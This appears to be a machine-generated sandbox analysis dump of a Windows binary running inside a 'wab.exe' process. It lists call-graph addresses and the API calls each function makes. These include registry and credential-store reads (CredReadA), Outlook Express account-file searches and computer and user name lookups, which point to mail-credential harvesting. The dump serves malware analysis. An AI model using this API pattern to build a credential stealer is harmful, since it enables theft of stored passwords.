401fef memset memset sprintf 33496->33497 33504 401fc9 33496->33504 33629 410b1e 33497->33629 33500 402165 33500->33495 33501 402076 memset memset strlen strlen 33501->33504 33502 4070e3 strlen _mbscat _mbscpy _mbscat 33502->33504 33503 4020dd strlen strlen 33503->33504 33504->33495 33504->33496 33504->33500 33504->33501 33504->33502 33504->33503 33505 406f81 GetFileAttributesA 33504->33505 33506 402167 _mbscpy 33504->33506 33636 410b62 RegEnumKeyExA 33504->33636 33505->33504 33506->33495 33508 40c422 33507->33508 33509 40c425 _mbscat _mbscpy _mbscpy 33507->33509 33508->33509 33510 40c49d 33509->33510 33511 40c512 33510->33511 33512 40c502 GetWindowPlacement 33510->33512 33513 40c538 33511->33513 33658 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33511->33658 33512->33511 33651 409b31 33513->33651 33517 40ba28 33518 40ba87 33517->33518 33522 40ba3c 33517->33522 33661 406c62 LoadCursorA SetCursor 33518->33661 33520 40ba8c 33662 4107f1 33520->33662 33665 410a9c RegOpenKeyExA 33520->33665 33666 404734 33520->33666 33674 404785 33520->33674 33677 403c16 33520->33677 33521 40ba43 _mbsicmp 33521->33522 33522->33518 33522->33521 33753 40b5e5 10 API calls 33522->33753 33523 40baa0 33524 407e30 _strcmpi 33523->33524 33527 40bab0 33524->33527 33525 40bafa SetCursor 33525->33390 33527->33525 33528 40baf1 qsort 33527->33528 33528->33525 34113 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33534->34113 33536 40b00e 33537 40b016 33536->33537 33538 40b01f GetStdHandle 33536->33538 34114 406d1a CreateFileA 33537->34114 33540 40b01c 33538->33540 33541 40b035 33540->33541 33542 40b12d 33540->33542 34115 406c62 LoadCursorA SetCursor 33541->34115 34119 406d77 9 API calls 33542->34119 33545 40b136 33556 40c580 28 API calls 33545->33556 33546 40b042 33547 40b087 33546->33547 33553 40b0a1 33546->33553 34116 40a57c strlen WriteFile 33546->34116 33547->33553 34117 40a699 12 API calls 33547->34117 33550 40b0d6 33551 40b116 CloseHandle 33550->33551 33552 40b11f SetCursor 33550->33552 33551->33552 33552->33545 33553->33550 34118 406d77 9 API calls 33553->34118 33555->33384 33556->33387 33569 409a32 33557->33569 33560 409c80 memcpy memcpy 33561 409cda 33560->33561 33561->33560 33562 408db6 12 API calls 33561->33562 33563 409d18 ??2@YAPAXI ??2@YAPAXI 33561->33563 33562->33561 33564 409d54 ??2@YAPAXI 33563->33564 33565 409d8b 33563->33565 33564->33565 33579 409b9c 33565->33579 33568 4023c1 33568->33469 33570 409a44 33569->33570 33571 409a3d ??3@YAXPAX 33569->33571 33572 409a52 33570->33572 33573 409a4b ??3@YAXPAX 33570->33573 33571->33570 33574 409a5c ??3@YAXPAX 33572->33574 33576 409a63 33572->33576 33573->33572 33574->33576 33575 409a83 ??2@YAPAXI ??2@YAPAXI 33575->33560 33576->33575 33577 409a73 ??3@YAXPAX 33576->33577 33578 409a7c ??3@YAXPAX 33576->33578 33577->33578 33578->33575 33580 407a55 ??3@YAXPAX 33579->33580 33581 409ba5 33580->33581 33582 407a55 ??3@YAXPAX 33581->33582 33583 409bad 33582->33583 33584 407a55 ??3@YAXPAX 33583->33584 33585 409bb5 33584->33585 33586 407a55 ??3@YAXPAX 33585->33586 33587 409bbd 33586->33587 33588 407a1f 4 API calls 33587->33588 33589 409bd0 33588->33589 33590 407a1f 4 API calls 33589->33590 33591 409bda 33590->33591 33592 407a1f 4 API calls 33591->33592 33593 409be4 33592->33593 33594 407a1f 4 API calls 33593->33594 33595 409bee 33594->33595 33595->33568 33597 410d0e 2 API calls 33596->33597 33598 410dca 33597->33598 33599 410dfd memset 33598->33599 33638 4070ae 33598->33638 33600 410e1d 33599->33600 33641 410a9c RegOpenKeyExA 33600->33641 33604 410e4a 33605 410e7f _mbscpy 33604->33605 33642 410d3d _mbscpy 33604->33642 33606 401e9e strlen strlen 33605->33606 33606->33472 33606->33473 33608 410e5b 33643 410add RegQueryValueExA 33608->33643 33610 410e73 RegCloseKey 33610->33605 33611->33476 33612->33482 33644 410a9c RegOpenKeyExA 33613->33644 33615 401c4c 33616 401cad 33615->33616 33645 410add RegQueryValueExA 33615->33645 33616->33485 33616->33486 33618 401c6a 33619 401c71 strchr 33618->33619 33620 401ca4 RegCloseKey 33618->33620 33619->33620 33621 401c85 strchr 33619->33621 33620->33616 33621->33620 33622 401c94 33621->33622 33646 406f06 strlen 33622->33646 33624 401ca1 33624->33620 33625->33488 33626->33473 33627->33479 33628->33504 33649 410a9c RegOpenKeyExA 33629->33649 33631 410b34 33632 410b5d 33631->33632 33650 410add RegQueryValueExA 33631->33650 33632->33504 33634 410b4c RegCloseKey 33634->33632 33636->33504 33637->33493 33639 4070bd GetVersionExA 33638->33639 33640 4070ce 33638->33640 33639->33640 33640->33599 33640->33606 33641->33604 33642->33608 33643->33610 33644->33615 33645->33618 33647 406f17 33646->33647 33648 406f1a memcpy 33646->33648 33647->33648 33648->33624 33649->33631 33650->33634 33652 409b40 33651->33652 33654 409b4e 33651->33654 33659 409901 memset SendMessageA 33652->33659 33655 409b99 33654->33655 33656 409b8b 33654->33656 33655->33517 33660 409868 SendMessageA 33656->33660 33658->33513 33659->33654 33660->33655 33661->33520 33663 410807 33662->33663 33664 4107fc FreeLibrary 33662->33664 33663->33523 33664->33663 33665->33523 33667 404785 FreeLibrary 33666->33667 33668 40473b LoadLibraryA 33667->33668 33669 40474c GetProcAddress 33668->33669 33672 40476e 33668->33672 33670 404764 33669->33670 33669->33672 33670->33672 33671 404781 33671->33523 33672->33671 33673 404785 FreeLibrary 33672->33673 33673->33671 33675 4047a3 33674->33675 33676 404799 FreeLibrary 33674->33676 33675->33523 33676->33675 33678 4107f1 FreeLibrary 33677->33678 33679 403c30 LoadLibraryA 33678->33679 33680 403c74 33679->33680 33681 403c44 GetProcAddress 33679->33681 33683 4107f1 FreeLibrary 33680->33683 33681->33680 33682 403c5e 33681->33682 33682->33680 33687 403c6b 33682->33687 33684 403c7b 33683->33684 33685 404734 3 API calls 33684->33685 33686 403c86 33685->33686 33754 4036e5 33686->33754 33687->33684 33690 4036e5 23 API calls 33691 403c9a 33690->33691 33692 4036e5 23 API calls 33691->33692 33693 403ca4 33692->33693 33694 4036e5 23 API calls 33693->33694 33695 403cae 33694->33695 33764 4085d2 33695->33764 33703 403cf7 33810 410a9c RegOpenKeyExA 33703->33810 33704 403ce5 33704->33703 33945 402bd1 39 API calls 33704->33945 33707 403d0a 33708 403d1c 33707->33708 33946 402bd1 39 API calls 33707->33946 33811 402c5d 33708->33811 33712 4070ae GetVersionExA 33713 403d31 33712->33713 33829 410a9c RegOpenKeyExA 33713->33829 33715 403d51 33716 403d61 33715->33716 33947 402b22 46 API calls 33715->33947 33830 410a9c RegOpenKeyExA 33716->33830 33719 403d87 33720 403d97 33719->33720 33948 402b22 46 API calls 33719->33948 33831 410a9c RegOpenKeyExA 33720->33831 33723 403dbd 33724 403dcd 33723->33724 33949 402b22 46 API calls 33723->33949 33832 410808 33724->33832 33728 404785 FreeLibrary 33729 403de8 33728->33729 33836 402fdb 33729->33836 33732 402fdb 34 API calls 33733 403e00 33732->33733 33852 4032b7 33733->33852 33742 403e3b 33744 403e73 33742->33744 33745 403e46 _mbscpy 33742->33745 33899 40fb00 33744->33899 33951 40f334 334 API calls 33745->33951 33753->33522 33755 4037c5 33754->33755 33756 4036fb 33754->33756 33755->33690 33756->33755 33757 403716 strchr 33756->33757 33757->33755 33758 403730 33757->33758 33952 4021b6 memset 33758->33952 33760 40373f _mbscpy _mbscpy strlen 33761 4037a4 _mbscpy 33760->33761 33762 403789 sprintf 33760->33762 33953 4023e5 16 API calls 33761->33953 33762->33761 33765 4085e2 33764->33765 33954 4082cd 11 API calls 33765->33954 33769 408600 33770 403cba 33769->33770 33771 40860b memset 33769->33771 33782 40821d 33770->33782 33957 410b62 RegEnumKeyExA 33771->33957 33773 4086d2 RegCloseKey 33773->33770 33775 408637 33775->33773 33776 40865c memset 33775->33776 33958 410a9c RegOpenKeyExA 33775->33958 33961 410b62 RegEnumKeyExA 33775->33961 33959 410add RegQueryValueExA 33776->33959 33779 408694 33960 40848b 10 API calls 33779->33960 33781 4086ab RegCloseKey 33781->33775 33962 410a9c RegOpenKeyExA 33782->33962 33784 40823f 33785 403cc6 33784->33785 33786 408246 memset 33784->33786 33794 4086e0 33785->33794 33963 410b62 RegEnumKeyExA 33786->33963 33788 4082bf RegCloseKey 33788->33785 33790 40826f 33790->33788 33964 410a9c RegOpenKeyExA 33790->33964 33965 4080ed 11 API calls 33790->33965 33966 410b62 RegEnumKeyExA 33790->33966 33793 4082a2 RegCloseKey 33793->33790 33967 4045db 33794->33967 33796 4088ef 33975 404656 33796->33975 33800 408737 wcslen 33800->33796 33806 40876a 33800->33806 33801 40877a _wcsncoll 33801->33806 33803 404734 3 API calls 33803->33806 33804 404785 FreeLibrary 33804->33806 33805 408812 memset 33805->33806 33807 40883c memcpy wcschr 33805->33807 33806->33796 33806->33801 33806->33803 33806->33804 33806->33805 33806->33807 33808 4088c3 LocalFree 33806->33808 33978 40466b _mbscpy 33806->33978 33807->33806 33808->33806 33809 410a9c RegOpenKeyExA 33809->33704 33810->33707 33979 410a9c RegOpenKeyExA 33811->33979 33813 402c7a 33814 402da5 33813->33814 33815 402c87 memset 33813->33815 33814->33712 33980 410b62 RegEnumKeyExA 33815->33980 33817 402d9c RegCloseKey 33817->33814 33818 410b1e 3 API calls 33819 402ce4 memset sprintf 33818->33819 33981 410a9c RegOpenKeyExA 33819->33981 33821 402d28 33822 402d3a sprintf 33821->33822 33982 402bd1 39 API calls 33821->33982 33983 410a9c RegOpenKeyExA 33822->33983 33827 402cb2 33827->33817 33827->33818 33828 402d9a 33827->33828 33984 402bd1 39 API calls 33827->33984 33985 410b62 RegEnumKeyExA 33827->33985 33828->33817 33829->33715 33830->33719 33831->33723 33833 410816 33832->33833 33834 4107f1 FreeLibrary 33833->33834 33835 403ddd 33834->33835 33835->33728 33986 410a9c RegOpenKeyExA 33836->33986 33838 402ff9 33839 403006 memset 33838->33839 33840 40312c 33838->33840 33987 410b62 RegEnumKeyExA 33839->33987 33840->33732 33842 403122 RegCloseKey 33842->33840 33843 410b1e 3 API calls 33844 403058 memset sprintf 33843->33844 33988 410a9c RegOpenKeyExA 33844->33988 33846 4030a2 memset 33989 410b62 RegEnumKeyExA 33846->33989 33848 410b62 RegEnumKeyExA 33851 403033 33848->33851 33849 4030f9 RegCloseKey 33849->33851 33851->33842 33851->33843 33851->33846 33851->33848 33851->33849 33990 402db3 26 API calls 33851->33990 33853 4032d5 33852->33853 33854 4033a9 33852->33854 33991 4021b6 memset 33853->33991 33867 4034e4 memset memset 33854->33867 33856 4032e1 33992 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33856->33992 33858 4032ea 33859 4032f8 memset GetPrivateProfileSectionA 33858->33859 33993 4023e5 16 API calls 33858->33993 33859->33854 33864 40332f 33859->33864 33861 40339b strlen 33861->33854 33861->33864 33863 403350 strchr 33863->33864 33864->33854 33864->33861 33994 4021b6 memset 33864->33994 33995 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33864->33995 33996 4023e5 16 API calls 33864->33996 33868 410b1e 3 API calls 33867->33868 33869 40353f 33868->33869 33870 40357f 33869->33870 33871 403546 _mbscpy 33869->33871 33875 403985 33870->33875 33997 406d55 strlen _mbscat 33871->33997 33873 403565 _mbscat 33998 4033f0 19 API calls 33873->33998 33999 40466b _mbscpy 33875->33999 33879 4039aa 33880 4039ff 33879->33880 34000 40f460 memset memset 33879->34000 34021 40f6e2 33879->34021 34039 4038e8 21 API calls 33879->34039 33882 404785 FreeLibrary 33880->33882 33883 403a0b 33882->33883 33884 4037ca memset memset 33883->33884 34047 444551 memset 33884->34047 33887 4038e2 33887->33742 33950 40f334 334 API calls 33887->33950 33889 40382e 33890 406f06 2 API calls 33889->33890 33891 403843 33890->33891 33892 406f06 2 API calls 33891->33892 33893 403855 strchr 33892->33893 33894 403884 _mbscpy 33893->33894 33895 403897 strlen 33893->33895 33896 4038bf _mbscpy 33894->33896 33895->33896 33897 4038a4 sprintf 33895->33897 34059 4023e5 16 API calls 33896->34059 33897->33896 33900 44b090 33899->33900 33901 40fb10 RegOpenKeyExA 33900->33901 33902 403e7f 33901->33902 33903 40fb3b RegOpenKeyExA 33901->33903 33913 40f96c 33902->33913 33904 40fb55 RegQueryValueExA 33903->33904 33905 40fc2d RegCloseKey 33903->33905 33906 40fc23 RegCloseKey 33904->33906 33907 40fb84 33904->33907 33905->33902 33906->33905 33908 404734 3 API calls 33907->33908 33909 40fb91 33908->33909 33909->33906 33910 40fc19 LocalFree 33909->33910 33911 40fbdd memcpy memcpy 33909->33911 33910->33906 34064 40f802 11 API calls 33911->34064 33914 4070ae GetVersionExA 33913->33914 33915 40f98d 33914->33915 33916 4045db 7 API calls 33915->33916 33917 40f9a9 33916->33917 33918 40fae6 33917->33918 33921 40fa13 memset WideCharToMultiByte 33917->33921 33919 404656 FreeLibrary 33918->33919 33920 403e85 33919->33920 33925 4442ea memset 33920->33925 33921->33917 33922 40fa43 _strnicmp 33921->33922 33922->33917 33923 40fa5b WideCharToMultiByte 33922->33923 33923->33917 33924 40fa88 WideCharToMultiByte 33923->33924 33924->33917 33926 410dbb 9 API calls 33925->33926 33927 444329 33926->33927 34065 40759e strlen strlen 33927->34065 33932 410dbb 9 API calls 33933 444350 33932->33933 33934 40759e 3 API calls 33933->33934 33935 44435a 33934->33935 33936 444212 65 API calls 33935->33936 33937 444366 memset memset 33936->33937 33938 410b1e 3 API calls 33937->33938 33939 4443b9 ExpandEnvironmentStringsA strlen 33938->33939 33940 4443f4 _strcmpi 33939->33940 33941 4443e5 33939->33941 33942 403e91 33940->33942 33943 44440c 33940->33943 33941->33940 33942->33523 33944 444212 65 API calls 33943->33944 33944->33942 33945->33703 33946->33708 33947->33716 33948->33720 33949->33724 33950->33742 33951->33744 33952->33760 33953->33755 33955 40841c 33954->33955 33956 410a9c RegOpenKeyExA 33955->33956 33956->33769 33957->33775 33958->33775 33959->33779 33960->33781 33961->33775 33962->33784 33963->33790 33964->33790 33965->33793 33966->33790 33968 404656 FreeLibrary 33967->33968 33969 4045e3 LoadLibraryA 33968->33969 33970 404651 33969->33970 33971 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33969->33971 33970->33796 33970->33800 33972 40463d 33971->33972 33973 404643 33972->33973 33974 404656 FreeLibrary 33972->33974 33973->33970 33974->33970 33976 403cd2 33975->33976 33977 40465c FreeLibrary 33975->33977 33976->33809 33977->33976 33978->33806 33979->33813 33980->33827 33981->33821 33982->33822 33983->33827 33984->33827 33985->33827 33986->33838 33987->33851 33988->33851 33989->33851 33990->33851 33991->33856 33992->33858 33993->33859 33994->33863 33995->33864 33996->33864 33997->33873 33998->33870 33999->33879 34040 4078ba 34000->34040 34003 4078ba _mbsnbcat 34004 40f5a3 RegOpenKeyExA 34003->34004 34005 40f5c3 RegQueryValueExA 34004->34005 34006 40f6d9 34004->34006 34007 40f6d0 RegCloseKey 34005->34007 34008 40f5f0 34005->34008 34006->33879 34007->34006 34008->34007 34009 40f675 34008->34009 34044 40466b _mbscpy 34008->34044 34009->34007 34045 4012ee strlen 34009->34045 34011 40f611 34013 404734 3 API calls 34011->34013 34018 40f616 34013->34018 34014 40f69e RegQueryValueExA 34014->34007 34015 40f6c1 34014->34015 34015->34007 34016 40f66a 34017 404785 FreeLibrary 34016->34017 34017->34009 34018->34016 34019 40f661 LocalFree 34018->34019 34020 40f645 memcpy 34018->34020 34019->34016 34020->34019 34046 40466b _mbscpy 34021->34046 34023 40f6fa 34024 4045db 7 API calls 34023->34024 34025 40f708 34024->34025 34026 404734 3 API calls 34025->34026 34033 40f7e2 34025->34033 34028 40f715 34026->34028 34027 404656 FreeLibrary 34029 40f7f1 34027->34029 34030 40f71d CredReadA 34028->34030 34028->34033 34031 404785 FreeLibrary 34029->34031 34030->34033 34034 40f734 34030->34034 34032 40f7fc 34031->34032 34032->33879 34033->34027 34034->34033 34035 40f797 WideCharToMultiByte 34034->34035 34036 40f7b8 strlen 34035->34036 34037 40f7d9 LocalFree 34035->34037 34036->34037 34038 40f7c8 _mbscpy 34036->34038 34037->34033 34038->34037 34039->33879 34041 4078e6 34040->34041 34042 4078c7 _mbsnbcat 34041->34042 34043 4078ea 34041->34043 34042->34041 34043->34003 34044->34011 34045->34014 34046->34023 34060 410a9c RegOpenKeyExA 34047->34060 34049 40381a 34049->33887 34058 4021b6 memset 34049->34058 34050 44458b 34050->34049 34061 410add RegQueryValueExA 34050->34061 34052 4445a4 34053 4445dc RegCloseKey 34052->34053 34062 410add RegQueryValueExA 34052->34062 34053->34049 34055 4445c1 34055->34053 34063 444879 30 API calls 34055->34063 34057 4445da 34057->34053 34058->33889 34059->33887 34060->34050 34061->34052 34062->34055 34063->34057 34064->33910 34066 4075c9 34065->34066 34067 4075bb _mbscat 34065->34067 34068 444212 34066->34068 34067->34066 34085 407e9d 34068->34085 34071 44424d 34072 444274 34071->34072 34073 444258 34071->34073 34093 407ef8 34071->34093 34074 407e9d 9 API calls 34072->34074 34110 444196 52 API calls 34073->34110 34081 4442a0 34074->34081 34076 407ef8 9 API calls 34076->34081 34077 4442ce 34107 407f90 34077->34107 34081->34076 34081->34077 34083 444212 65 API calls 34081->34083 34103 407e62 34081->34103 34082 407f90 FindClose 34084 4442e4 34082->34084 34083->34081 34084->33932 34086 407f90 FindClose 34085->34086 34087 407eaa 34086->34087 34088 406f06 2 API calls 34087->34088 34089 407ebd strlen strlen 34088->34089 34090 407ee1 34089->34090 34091 407eea 34089->34091 34111 4070e3 strlen _mbscat _mbscpy _mbscat 34090->34111 34091->34071 34094 407f03 FindFirstFileA 34093->34094 34095 407f24 FindNextFileA 34093->34095 34096 407f3f 34094->34096 34097 407f46 strlen strlen 34095->34097 34098 407f3a 34095->34098 34096->34097 34101 407f7f 34096->34101 34099 407f76 34097->34099 34097->34101 34100 407f90 FindClose 34098->34100 34112 4070e3 strlen _mbscat _mbscpy _mbscat 34099->34112 34100->34096 34101->34071 34104 407e94 34103->34104 34105 407e6c strcmp 34103->34105 34104->34081 34105->34104 34106 407e83 strcmp 34105->34106 34106->34104 34108 407fa3 34107->34108 34109 407f99 FindClose 34107->34109 34108->34082 34109->34108 34110->34071 34111->34091 34112->34101 34113->33536 34114->33540 34115->33546 34116->33547 34117->33553 34118->33550 34119->33545 34128 411853 RtlInitializeCriticalSection memset 34129 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34303 40a256 13 API calls 34305 432e5b 17 API calls 34307 43fa5a 20 API calls 34131 401060 41 API calls 34310 427260 CloseHandle memset memset 33210 410c68 FindResourceA 33211 410c81 SizeofResource 33210->33211 33212 410cae 33210->33212 33211->33212 33213 410c92 LoadResource 33211->33213 33213->33212 33214 410ca0 LockResource 33213->33214 33214->33212 34312 405e69 14 API calls 34136 433068 15 API calls __fprintf_l 34314 414a6d 18 API calls 34315 43fe6f 134 API calls 34138 424c6d 15 API calls __fprintf_l 34316 426741 19 API calls 34140 440c70 17 API calls 34141 443c71 44 API calls 34144 427c79 24 API calls 34319 416e7e memset __fprintf_l 34148 42800b 47 API calls 34149 425115 85 API calls __fprintf_l 34322 41960c 61 API calls 34150 43f40c 122 API calls __fprintf_l 34153 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34154 43f81a 20 API calls 34156 414c20 memset memset 34157 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34326 414625 18 API calls 34327 404225 modf 34328 403a26 strlen WriteFile 34330 40422a 12 API calls 34334 427632 memset memset memcpy 34335 40ca30 59 API calls 34336 404235 26 API calls 34158 42ec34 61 API calls __fprintf_l 34159 425115 76 API calls __fprintf_l 34337 425115 77 API calls __fprintf_l 34339 44223a 38 API calls 34165 43183c 112 API calls 34340 44b2c5 _onexit __dllonexit 34345 42a6d2 memcpy __allrem 34167 405cda 65 API calls 34353 43fedc 138 API calls 34354 4116e1 16 API calls __fprintf_l 34170 4244e6 19 API calls 34172 42e8e8 127 API calls __fprintf_l 34173 4118ee RtlLeaveCriticalSection 34359 43f6ec 22 API calls 34175 425115 119 API calls __fprintf_l 33200 410cf3 EnumResourceNamesA 34362 4492f0 memcpy memcpy 34364 43fafa 18 API calls 34366 4342f9 15 API calls __fprintf_l 34176 4144fd 19 API calls 34368 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34369 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34372 443a84 _mbscpy 34374 43f681 17 API calls 34179 404487 22 API calls 34376 415e8c 16 API calls __fprintf_l 34183 411893 RtlDeleteCriticalSection __fprintf_l 34184 41a492 42 API calls 34380 403e96 34 API calls 34381 410e98 memset SHGetPathFromIDList SendMessageA 34186 426741 109 API calls __fprintf_l 34187 4344a2 18 API calls 34188 4094a2 10 API calls 34190 4108a4 memcpy UuidFromStringA UuidFromStringA UuidFromStringA memcpy 34384 4116a6 15 API calls __fprintf_l 34385 43f6a4 17 API calls 34386 440aa3 20 API calls 34388 427430 45 API calls 34192 4090b0 7 API calls 34193 4148b0 15 API calls 34195 4118b4 RtlEnterCriticalSection 34196 4014b7 CreateWindowExA 34197 40c8b8 19 API calls 34199 4118bf RtlTryEnterCriticalSection 34393 42434a 18 API calls __fprintf_l 34395 405f53 12 API calls 34207 43f956 59 API calls 34209 40955a 17 API calls 34210 428561 36 API calls 34211 409164 7 API calls 34399 404366 19 API calls 34403 40176c ExitProcess 34406 410777 42 API calls 34216 40dd7b 51 API calls 34217 425d7c 16 API calls __fprintf_l 34408 43f6f0 25 API calls 34409 42db01 22 API calls 34218 412905 15 API calls __fprintf_l 34410 403b04 54 API calls 34411 405f04 SetDlgItemTextA GetDlgItemTextA 34412 44b301 ??3@YAXPAX 34415 4120ea 14 API calls 3 library calls 34416 40bb0a 8 API calls 34418 413f11 strcmp 34222 434110 17 API calls __fprintf_l 34225 425115 108 API calls __fprintf_l 34419 444b11 _onexit 34227 425115 76 API calls __fprintf_l 34230 429d19 10 API calls 34422 444b1f __dllonexit 34423 409f20 _strcmpi 34232 42b927 31 API calls 34426 433f26 19 API calls __fprintf_l 34427 44b323 FreeLibrary 34428 427f25 46 API calls 34429 43ff2b 17 API calls 34430 43fb30 19 API calls 34239 414d36 16 API calls 34241 40ad38 7 API calls 34432 433b38 16 API calls __fprintf_l 34433 44b33b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 34245 426741 21 API calls 34246 40c5c3 125 API calls 34248 43fdc5 17 API calls 34434 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34251 4161cb memcpy memcpy memcpy memcpy 33215 44b3cf 33216 44b3e6 33215->33216 33218 44b454 33215->33218 33216->33218 33222 44b40e 33216->33222 33219 44b405 33219->33218 33220 44b435 VirtualProtect 33219->33220 33220->33218 33221 44b444 VirtualProtect 33220->33221 33221->33218 33223 44b413 33222->33223 33225 44b454 33223->33225 33229 44b42b 33223->33229 33226 44b41c 33226->33225 33227 44b435 VirtualProtect 33226->33227 33227->33225 33228 44b444 VirtualProtect 33227->33228 33228->33225 33230 44b431 33229->33230 33231 44b435 VirtualProtect 33230->33231 33233 44b454 33230->33233 33232 44b444 VirtualProtect 33231->33232 33231->33233 33232->33233 34439 43ffc8 18 API calls 34252 4281cc 15 API calls __fprintf_l 34441 4383cc 110 API calls __fprintf_l 34253 4275d3 41 API calls 34442 4153d3 22 API calls __fprintf_l 34254 444dd7 _XcptFilter 34447 4013de 15 API calls 34449 425115 111 API calls __fprintf_l 34450 43f7db 18 API calls 34453 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34256 4335ee 16 API calls __fprintf_l 34455 429fef 11 API calls 34257 444deb _exit _c_exit 34456 40bbf0 138 API calls 34260 425115 79 API calls __fprintf_l 34460 437ffa 22 API calls 34264 4021ff 14 API calls 34265 43f5fc 149 API calls 34461 40e381 9 API calls 34267 405983 40 API calls 34268 42b186 27 API calls __fprintf_l 34269 427d86 76 API calls 34270 403585 20 API calls 34272 42e58e 18 API calls __fprintf_l 34275 425115 75 API calls __fprintf_l 34277 401592 8 API calls 33201 410b92 33204 410a6b 33201->33204 33203 410bb2 33205 410a77 33204->33205 33206 410a89 GetPrivateProfileIntA 33204->33206 33209 410983 memset _itoa WritePrivateProfileStringA 33205->33209 33206->33203 33208 410a84 33208->33203 33209->33208 34465 434395 16 API calls 34279 441d9c memcmp 34467 43f79b 119 API calls 34280 40c599 43 API calls 34468 426741 87 API calls 34284 4401a6 21 API calls 34286 426da6 memcpy memset memset memcpy 34287 4335a5 15 API calls 34289 4299ab memset memset memcpy memset memset 34290 40b1ab 8 API calls 34473 425115 76 API calls __fprintf_l 34477 4113b2 18 API calls 2 library calls 34481 40a3b8 memset sprintf SendMessageA 33234 410bbc 33237 4109cf 33234->33237 33238 4109dc 33237->33238 33239 410a23 memset GetPrivateProfileStringA 33238->33239 33240 4109ea memset 33238->33240 33245 407646 strlen 33239->33245 33250 4075cd sprintf memcpy 33240->33250 33243 410a0c WritePrivateProfileStringA 33244 410a65 33243->33244 33246 40765a 33245->33246 33248 40765c 33245->33248 33246->33244 33247 4076a3 33247->33244 33248->33247 33251 40737c strtoul 33248->33251 33250->33243 33251->33248 34292 40b5bf memset memset _mbsicmp

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                                APIs
                                • memset.MSVCRT ref: 0040832F
                                • memset.MSVCRT ref: 00408343
                                • memset.MSVCRT ref: 0040835F
                                • memset.MSVCRT ref: 00408376
                                • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                • strlen.MSVCRT ref: 004083E9
                                • strlen.MSVCRT ref: 004083F8
                                • memcpy.MSVCRT ref: 0040840A
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                • String ID: 5$H$O$b$i$}$}
                                • API String ID: 1832431107-3760989150
                                • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                                APIs
                                • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                • strlen.MSVCRT ref: 00407F5C
                                • strlen.MSVCRT ref: 00407F64
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: FileFindstrlen$FirstNext
                                • String ID: ACD
                                • API String ID: 379999529-620537770
                                • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A

                                Control-flow Graph

                                APIs
                                • memset.MSVCRT ref: 00401E8B
                                • strlen.MSVCRT ref: 00401EA4
                                • strlen.MSVCRT ref: 00401EB2
                                • strlen.MSVCRT ref: 00401EF8
                                • strlen.MSVCRT ref: 00401F06
                                • memset.MSVCRT ref: 00401FB1
                                • atoi.MSVCRT ref: 00401FE0
                                • memset.MSVCRT ref: 00402003
                                • sprintf.MSVCRT ref: 00402030
                                  • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                • memset.MSVCRT ref: 00402086
                                • memset.MSVCRT ref: 0040209B
                                • strlen.MSVCRT ref: 004020A1
                                • strlen.MSVCRT ref: 004020AF
                                • strlen.MSVCRT ref: 004020E2
                                • strlen.MSVCRT ref: 004020F0
                                • memset.MSVCRT ref: 00402018
                                  • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                                  • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                • _mbscpy.MSVCRT ref: 00402177
                                • RegCloseKey.ADVAPI32(00000000), ref: 00402181
